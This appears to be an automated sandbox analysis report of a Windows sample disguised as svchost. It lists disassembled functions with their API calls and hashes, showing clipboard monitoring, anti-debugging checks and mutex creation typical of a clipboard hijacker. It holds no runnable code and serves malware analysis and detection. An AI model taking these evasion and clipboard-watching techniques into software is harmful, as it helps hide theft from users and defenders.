                                      • API String ID: 1734398998-0
                                      • Opcode ID: 80fc6bce9c256495076652354beab7356473027193b4c83409bfd0098307c8fb
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 80fc6bce9c256495076652354beab7356473027193b4c83409bfd0098307c8fb
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69
                                      Function 0040DF97 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 158 40df97-40dfb0 call 40de20 161 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 158->161 162 40dfe2 call 40d7f0 161->162 163 40dfdc-40dfe0 161->163 166 40dfe7 162->166 163->162 165 40dfec-40dff0 163->165 167 40dff6-40e00c call 40f476 165->167 168 40e0ab-40e0af 165->168 166->168 174 40e04e-40e064 call 40f476 167->174 175 40e00e-40e019 167->175 170 40e0b1-40e0b5 LocalFree 168->170 171 40e0bb-40e119 168->171 170->171 182 40e0a6 call 40d7f0 174->182 183 40e066-40e071 174->183 176 40e01b-40e031 call 40f476 175->176 177 40e03c-40e043 175->177 176->177 189 40e033-40e039 176->189 181 40e044 call 405b10 177->181 185 40e049-40e04c 181->185 182->168 186 40e073-40e089 call 40f476 183->186 187 40e094-40e0a4 call 405e10 183->187 185->168 186->187 194 40e08b-40e091 186->194 187->168 189->177 194->187
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A
                                      Function 0040DFA6 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 195 40dfa6-40dfb0 call 40de20 198 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 195->198 199 40dfe2 call 40d7f0 198->199 200 40dfdc-40dfe0 198->200 203 40dfe7 199->203 200->199 202 40dfec-40dff0 200->202 204 40dff6-40e00c call 40f476 202->204 205 40e0ab-40e0af 202->205 203->205 211 40e04e-40e064 call 40f476 204->211 212 40e00e-40e019 204->212 207 40e0b1-40e0b5 LocalFree 205->207 208 40e0bb-40e119 205->208 207->208 219 40e0a6 call 40d7f0 211->219 220 40e066-40e071 211->220 213 40e01b-40e031 call 40f476 212->213 214 40e03c-40e043 212->214 213->214 226 40e033-40e039 213->226 218 40e044 call 405b10 214->218 222 40e049-40e04c 218->222 219->205 223 40e073-40e089 call 40f476 220->223 224 40e094-40e0a4 call 405e10 220->224 222->205 223->224 231 40e08b-40e091 223->231 224->205 226->214 231->224
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA
                                      Function 00411447 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 232 411447-411458 call 41141c ExitProcess
                                      APIs
                                      • ___crtCorExitProcess.LIBCMT ref: 0041144F
                                        • Part of subcall function 0041141C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00411454,00000000,?,00410BC2,000000FF,0000001E,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000), ref: 00411426
                                        • Part of subcall function 0041141C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411436
                                      • ExitProcess.KERNEL32 ref: 00411458
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                      • String ID:
                                      • API String ID: 2427264223-0
                                      • Opcode ID: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction ID: 97cd00bbafddeea18524e87ba9999e83b9df1a82b7e94daaf0906db5b7771dd5
                                      • Opcode Fuzzy Hash: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction Fuzzy Hash: 6DB09B310001087BCB012F12DC098893F15DB407507148035F50C05031DF71ADD5D589
                                      Function 0041169F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 235 41169f-4116ab call 41155f 237 4116b0-4116b4 235->237
                                      APIs
                                      • _doexit.LIBCMT ref: 004116AB
                                        • Part of subcall function 0041155F: __lock.LIBCMT ref: 0041156D
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(0041E0B0,00000020,004116C6,00000000,00000001,00000000,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115A9
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115BA
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(-00000004,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115E0
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115F3
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115FD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DecodePointer$__lock_doexit
                                      • String ID:
                                      • API String ID: 3343572566-0
                                      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction ID: 69d7dd60be9393ca9a75932822da633d8709a72556d2422c147b43d379804c5d
                                      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction Fuzzy Hash: 78B0923258020C33DA202646AC03F463A0E87C0B64F250022FA0D1D1A2A9A2A9A1808A

                                      Non-executed Functions

                                      Function 00405B10 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 183COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 385 405b10-405b2c 386 405b35-405b55 385->386 387 405b2e-405b30 385->387 389 405b57-405b59 386->389 390 405b5e-405b7f GetPEB 386->390 388 405e02-405e0f call 40e542 387->388 389->388 392 405b81-405b83 390->392 393 405b88-405bad GetPEB 390->393 392->388 395 405bb6-405bf6 call 4123e0 GetCurrentThread GetThreadContext 393->395 396 405baf-405bb1 393->396 399 405c35-405c4d call 401090 call 40e120 395->399 400 405bf8-405bff 395->400 396->388 410 405c5a-405c61 399->410 411 405c4f-405c57 GetModuleHandleA 399->411 401 405c01-405c08 400->401 402 405c2e-405c30 400->402 401->402 404 405c0a-405c11 401->404 402->388 404->402 406 405c13-405c1a 404->406 406->402 409 405c1c-405c23 406->409 409->402 412 405c25-405c2c 409->412 413 405c67-405c7f GetModuleHandleA 410->413 414 405d28-405d2f 410->414 411->410 412->399 412->402 415 405c81-405c8c LoadLibraryA 413->415 416 405c92-405cc7 GetProcAddress * 2 413->416 417 405d31-405d33 414->417 418 405d38-405d3f 414->418 415->416 419 405cc9-405cd0 416->419 420 405cde-405d13 GetProcAddress * 2 416->420 417->388 421 405d41-405d60 OpenMutexA 418->421 422 405d97-405da8 call 4052a0 418->422 419->420 424 405cd2-405cdc 419->424 420->414 425 405d15-405d1c 420->425 426 405d62-405d71 CloseHandle 421->426 427 405d76-405d91 CreateMutexA 421->427 431 405daa-405dbf call 402b00 422->431 432 405ddc-405de3 422->432 424->414 425->414 430 405d1e 425->430 426->388 427->422 428 405d93-405d95 427->428 428->388 430->414 431->432 437 405dc1-405dd6 call 4058a0 431->437 434 405de5-405df2 CloseHandle 432->434 435 405dfc 432->435 434->435 435->388 437->432
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 5f3a271f107c04a898097820e861df08812ee36672f426afcdc0ea391e2a129a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 5f3a271f107c04a898097820e861df08812ee36672f426afcdc0ea391e2a129a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19
                                      Function 00405390 Relevance: 25.7, APIs: 17, Instructions: 207clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      Function 00405670 Relevance: 12.1, APIs: 8, Instructions: 140timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59
                                      Function 0040D490 Relevance: 9.2, APIs: 6, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,C3108867,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      Function 0040E542 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D
                                      Function 00405E10 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f14a71db8132894cd86a835e0583c0bbe7e498396e1ae2ba2f5ffac09785f036
                                      • Instruction ID: 3d488141a1d6dfcad3178e7f4c6d8b2fbfca122575c8060525bc71110aaa322c
                                      • Opcode Fuzzy Hash: f14a71db8132894cd86a835e0583c0bbe7e498396e1ae2ba2f5ffac09785f036
                                      • Instruction Fuzzy Hash: 5C317230A155598AEB319B10C808BABBBB4EB44314F0440FBE449B62C1C67C9FC8CF5E
                                      Function 004014A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                      • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 004014AF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
                                      • API String ID: 3244773808-0
                                      • Opcode ID: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction ID: 65bc4ce697b09d766b27661658b024bedcce05a3cc3625d10305c865c1bed5cd
                                      • Opcode Fuzzy Hash: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction Fuzzy Hash: 6BD0A732505208FBCF10DFF19C0DAEE77ECEB05301F0441B6A805921A0D678CB14E676
                                      Function 004013A0 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 430fd5df558a3b1ae033b770011898e4f6cd620c13d66e46a3e24c072b499f86
                                      • Instruction ID: 038ddf458eee282a636a142cc17a3e7075d272d91e47c2f3912a22b1e81b3194
                                      • Opcode Fuzzy Hash: 430fd5df558a3b1ae033b770011898e4f6cd620c13d66e46a3e24c072b499f86
                                      • Instruction Fuzzy Hash: 8DD0123995D2CCABD702CB99D450B5DBFBCDB46640F0802D4EC4853702C12FAA19D6D1
                                      Function 004013D0 Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36cc5bf2f4ed321c1e374c383c5c7a5857d84be30a0155562b47e2e9e28c446b
                                      • Instruction ID: f0412936d34d56b2da9bc331bbda8acfa1cfcc633831e40a4104ab6d3392b165
                                      • Opcode Fuzzy Hash: 36cc5bf2f4ed321c1e374c383c5c7a5857d84be30a0155562b47e2e9e28c446b
                                      • Instruction Fuzzy Hash: E9D0121585C2CC6AD70287949415B9DFFF89B06644F4842C4E88813742C16B5B19C291
                                      Function 00410689 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 355 410689-41069b GetModuleHandleW 356 4106a6-4106ee GetProcAddress * 4 355->356 357 41069d-4106a5 call 4103d6 355->357 359 4106f0-4106f7 356->359 360 410706-410725 356->360 359->360 362 4106f9-410700 359->362 363 41072a-410738 TlsAlloc 360->363 362->360 364 410702-410704 362->364 365 4107ff 363->365 366 41073e-410749 TlsSetValue 363->366 364->360 364->363 368 410801-410803 365->368 366->365 367 41074f-410795 call 411471 EncodePointer * 4 call 412581 366->367 373 410797-4107b4 DecodePointer 367->373 374 4107fa call 4103d6 367->374 373->374 377 4107b6-4107c8 call 412773 373->377 374->365 377->374 380 4107ca-4107dd DecodePointer 377->380 380->374 382 4107df-4107f8 call 410413 GetCurrentThreadId 380->382 382->368
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
